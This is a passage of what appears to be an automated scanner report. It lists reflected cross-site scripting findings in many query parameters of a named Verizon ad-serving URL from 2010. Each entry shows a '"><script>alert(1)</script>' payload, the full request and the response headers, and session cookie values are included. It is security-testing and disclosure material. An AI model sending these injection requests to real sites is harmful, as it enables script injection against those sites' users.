GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=38c9e"><script>alert(1)</script>de0ed8fa512&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:57:19 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9336"><script>alert(1)</script>06f4f26e350 was submitted in the connex parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=e9336"><script>alert(1)</script>06f4f26e350&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:51:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dde95"><script>alert(1)</script>a822f79e323 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=dde95"><script>alert(1)</script>a822f79e323&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:52:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37937"><script>alert(1)</script>e02e08d3502 was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=37937"><script>alert(1)</script>e02e08d3502&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:53:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b765b"><script>alert(1)</script>85d8bcdeb44 was submitted in the msp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=b765b"><script>alert(1)</script>85d8bcdeb44&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:54:20 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
3.55. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebecc"><script>alert(1)</script>f8e5a220c07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&ebecc"><script>alert(1)</script>f8e5a220c07=1 HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:59:06 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1366 Content-Type: text/html Cache-Control: private Content-Length: 1366
The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcf3"><script>alert(1)</script>2819918f614 was submitted in the npa parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=2dcf3"><script>alert(1)</script>2819918f614&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:53:47 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa3fa"><script>alert(1)</script>c8d299f1c04 was submitted in the nxx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=fa3fa"><script>alert(1)</script>c8d299f1c04&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:54:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dcdc"><script>alert(1)</script>690eb2ffc82 was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=4dcdc"><script>alert(1)</script>690eb2ffc82&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:56:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 476c8"><script>alert(1)</script>1cd684a7591 was submitted in the partner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=476c8"><script>alert(1)</script>1cd684a7591&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:52:42 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ae33"><script>alert(1)</script>082704e552e was submitted in the popcity parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=3ae33"><script>alert(1)</script>082704e552e&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:50:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db20a"><script>alert(1)</script>ad98c8a48bd was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=db20a"><script>alert(1)</script>ad98c8a48bd&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:51:04 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671eb"><script>alert(1)</script>2aafe3d0cfd was submitted in the popdma parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=671eb"><script>alert(1)</script>2aafe3d0cfd&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:51:20 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21fa6"><script>alert(1)</script>3ed604c7372 was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=21fa6"><script>alert(1)</script>3ed604c7372&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:49:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33f3"><script>alert(1)</script>46c97c97412 was submitted in the popip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=e33f3"><script>alert(1)</script>46c97c97412&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:49:33 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 289de"><script>alert(1)</script>a27e6e3596 was submitted in the popservice parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=289de"><script>alert(1)</script>a27e6e3596&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:51:36 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1358 Content-Type: text/html Cache-Control: private Content-Length: 1358
The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1949"><script>alert(1)</script>a3917a638a8 was submitted in the popstate parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
